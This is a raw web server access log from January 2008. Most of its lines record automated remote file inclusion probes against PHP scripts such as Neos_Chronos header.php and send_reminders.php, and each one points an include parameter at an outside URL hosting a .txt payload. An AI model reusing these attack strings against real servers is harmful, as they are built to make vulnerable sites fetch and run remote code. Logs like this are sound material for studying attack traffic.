122.153.16.5 - - [02/Jan/2008:16:34:57 -0800] "GET /logs/access_071219.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:35:06 -0800] "GET /logs/access_071219.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:16:35:48 -0800] "GET //modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:16:35:48 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.149.203.6 - - [02/Jan/2008:16:36:13 -0800] "GET /logs/access_071018.log//modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:36:48 -0800] "GET /logs/access_071219.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:37:09 -0800] "GET /logs/access_071219.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:37:15 -0800] "GET /logs/access_071018.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:37:26 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:37:41 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:38:03 -0800] "GET /logs/access_071018.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:38:03 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:38:03 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:38:04 -0800] "GET /logs/access_071018.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:16:44:39 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.12.27.38 - - [02/Jan/2008:16:45:59 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.12.27.38 - - [02/Jan/2008:16:46:00 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:47:21 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:48:47 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:16:49:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:16:49:21 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:51:37 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:16:52:34 -0800] "GET /displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:53:04 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:16:53:21 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:16:54:08 -0800] "GET /logs/access_071224.log/displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:16:54:08 -0800] "GET /displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:16:54:08 -0800] "GET /logs/displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:16:54:09 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:16:54:09 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:16:54:09 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:54:13 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:16:56:45 -0800] "GET /logs/access_071224.log//addpost_newpoll.php?addpoll=preview&thispath=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:16:56:45 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:58:42 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:16:58:54 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:16:58:54 -0800] "GET //modules/xfsection/modify.php?dir_module=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:16:59:34 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:16:59:39 -0800] "GET /send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.227.193.235 - - [02/Jan/2008:17:00:27 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
71.227.193.235 - - [02/Jan/2008:17:00:27 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.xbox.com/en-US/games/m/mystIIIexile/details.page/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:17:01:22 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:17:05:01 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.59.152.224 - - [02/Jan/2008:17:05:42 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.die-twisters.de/_airedale//me.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:06:08 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:06:08 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:17:06:33 -0800] "GET /logs/access_071214.log/send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:17:06:34 -0800] "GET /send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:17:06:34 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.58 - - [02/Jan/2008:17:06:38 -0800] "GET /logs/access_071220.log/send_reminders.php?noSet=0&includedir=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:06:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:06:40 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.214.57.41 - - [02/Jan/2008:17:07:01 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.57.41 - - [02/Jan/2008:17:07:02 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.50.14.189 - - [02/Jan/2008:17:10:06 -0800] "GET /index.php?redir=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:12:59 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:12:59 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:13:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:13:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.197.170.165 - - [02/Jan/2008:17:14:02 -0800] "GET /functions.php?phpbb_root_path=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [02/Jan/2008:17:14:20 -0800] "GET /logs/access_071224.log/index.php?redir=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [02/Jan/2008:17:14:21 -0800] "GET /logs/index.php?redir=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:17:15:21 -0800] "GET /logs/access_071018.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:17:16:24 -0800] "GET /logs/access_071018.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.59.152.224 - - [02/Jan/2008:17:16:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.die-twisters.de/_airedale//me.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
122.153.16.5 - - [02/Jan/2008:17:17:02 -0800] "GET /logs/access_071018.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [02/Jan/2008:17:22:58 -0800] "GET /logs/access_071018.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.32.92.82 - - [02/Jan/2008:17:25:13 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.32.92.82 - - [02/Jan/2008:17:25:15 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.32.92.82 - - [02/Jan/2008:17:25:21 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.170.165 - - [02/Jan/2008:17:25:49 -0800] "GET /logs/access_071224.log/functions.php?phpbb_root_path=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.170.165 - - [02/Jan/2008:17:25:50 -0800] "GET /functions.php?phpbb_root_path=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.170.165 - - [02/Jan/2008:17:25:50 -0800] "GET /logs/functions.php?phpbb_root_path=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.79 - - [02/Jan/2008:17:28:55 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:29:48 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:29:49 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:17:30:05 -0800] "GET /logs/access_071224.log/functions.php?phpbb_root_path=http://webignite.net/images/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:17:30:05 -0800] "GET /functions.php?phpbb_root_path=http://webignite.net/images/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:17:30:06 -0800] "GET /logs/functions.php?phpbb_root_path=http://webignite.net/images/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.179.208 - - [02/Jan/2008:17:30:12 -0800] "GET /funny/?D=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:30:18 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:30:18 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.6.22.23 - - [02/Jan/2008:17:30:34 -0800] "GET /logs/access_071127.log HTTP/1.0" 200 203829 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.32.92.82 - - [02/Jan/2008:17:32:07 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.181.19.186 - - [02/Jan/2008:17:41:20 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Sogou web spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:17:45:05 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:17:45:05 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:17:45:05 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.126 - - [02/Jan/2008:17:46:28 -0800] "GET /logs/access_071116.log HTTP/1.0" 200 80772 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:47:19 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:47:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:47:41 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:47:41 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:17:49:39 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:17:49:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [02/Jan/2008:17:49:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.solidscripts.co.uk/components/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.248.224.106 - - [02/Jan/2008:17:51:04 -0800] "GET /logs/access_071224.log/displayCategory.php?basepath=http://webignite.net/images/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.248.224.106 - - [02/Jan/2008:17:51:07 -0800] "GET /displayCategory.php?basepath=http://webignite.net/images/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.248.224.106 - - [02/Jan/2008:17:51:11 -0800] "GET /logs/displayCategory.php?basepath=http://webignite.net/images/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:53:52 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:17:53:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:54:14 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.13.248.15 - - [02/Jan/2008:17:54:14 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
216.246.98.115 - - [02/Jan/2008:17:57:13 -0800] "GET /displayCategory.php?basepath=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:57:24 -0800] "GET /logs/access_071224.log//intern/admin/other/backup.php?admin=1&rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:57:24 -0800] "GET //intern/admin/other/backup.php?admin=1&rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [02/Jan/2008:17:57:24 -0800] "GET /logs//intern/admin/other/backup.php?admin=1&rootdir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
